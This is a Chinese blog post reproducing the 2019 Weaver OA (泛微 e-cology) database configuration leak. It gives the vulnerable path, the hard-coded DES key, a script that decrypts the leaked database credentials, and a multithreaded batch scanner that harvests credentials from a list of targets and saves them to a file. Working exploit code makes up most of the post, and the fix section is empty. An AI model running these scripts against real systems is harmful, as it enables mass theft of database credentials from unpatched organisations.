泛微OA数据库配置信息泄露漏洞

0x00 前言

泛微又双叒出问题了,2019年10月24日泛微OA被爆出数据库配置信息泄露,攻击者可通过访问指定页面获取加密的数据库配置信息,下面进行漏洞复现。

0x01 漏洞复现

发生信息泄露的页面为/mobile/DBconfigReader.jsp

访问可查看到一串乱码,返回一行乱码即表明漏洞存在。

此串乱码即为数据库配置信息经过DES加密后的结果,而默认密钥在源码中可查看为1z2x3c4v5b6n

验证脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests
import pyDes
import base64

def desdecode(secret_key, s):
cipherX = pyDes.des(' ')
cipherX.setKey(secret_key)
y = cipherX.decrypt(s)
return y
def info_decode(res):
data = desdecode('1z2x3c4v5b6n', res.strip())
data = data.strip()
print str(data)
return str(data)
if __name__ == '__main__':
url = 'http://zhengbao.wang/mobile/DBconfigReader.jsp'
res = requests.get(url).content
info_decode(res)

批量检测脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
import requests
import json
import Queue
import threading
import pyDes

class Bruter(object):
def __init__(self, urls,threads):

self.vb_urls = Queue.Queue()
self.threads = threads
for u in urls:
self.vb_urls.put(u[0])
#print self.vb_urls.get()
def vb5_rce(self):
with threading.Lock():
while self.vb_urls.qsize() > 0:
target = self.vb_urls.get()
if 'http' not in target:
target = 'http://'+target
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Content-Type': 'application/x-www-form-urlencoded'
}
url=target+'/mobile/DBconfigReader.jsp'
try:

res=requests.get(url=url,headers=headers,timeout=10)
if res.status_code == 200:
if ('\r\n\r\n' in res.text) and (':' in res.content) and 'java' not in res.text:
info = info_decode(res.content)
if 'user' in info:
print '[+] Vuluable :'+url+' '+res.text
file_write('e-cology-dbinfo.txt',url+' | '+info+'\n')
else:
print '[-] NotVuluable :'+url

else:
print "[-] Not access :"+str(res.status_code)+' | '+url
except:
print '[!] Error :'+url
def run(self):
for i in range(self.threads):
print '[+] thread '+ str(i)
t = threading.Thread(target=self.vb5_rce)
t.start()
def get_url():
with open('e-cology-jsp-info.txt','r') as f:
r = json.loads(f.read())
urls = r['results']
return urls

def file_write(name,results):
with open(name,mode='a') as file:
file.write(results)

def desdecode(secret_key, s):
cipherX = pyDes.des(' ')
cipherX.setKey(secret_key)
y = cipherX.decrypt(s)
return y
def info_decode(res):
data = desdecode('1z2x3c4v5b6n', res.strip())
data = data.strip()
#print str(data)
return str(data)


if __name__ == '__main__':
urls = get_url()
vb5_rce = Bruter(urls=urls,threads=20)
vb5_rce.run()

0x02 修复建议

0x03 参考链接

https://github.com/NS-Sp4ce/Weaver-OA-E-cology-Database-Leak/blob/master/OA.py

https://github.com/jas502n/DBconfigReader

本文标题:泛微OA数据库配置信息泄露漏洞

文章作者:boogle

发布时间:2019年10月30日 - 17:07

最后更新:2019年10月30日 - 19:18

原始链接:http://zhengbao.wang/泛微OA数据库配置信息泄露漏洞/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

感觉写的不错,给买个棒棒糖呗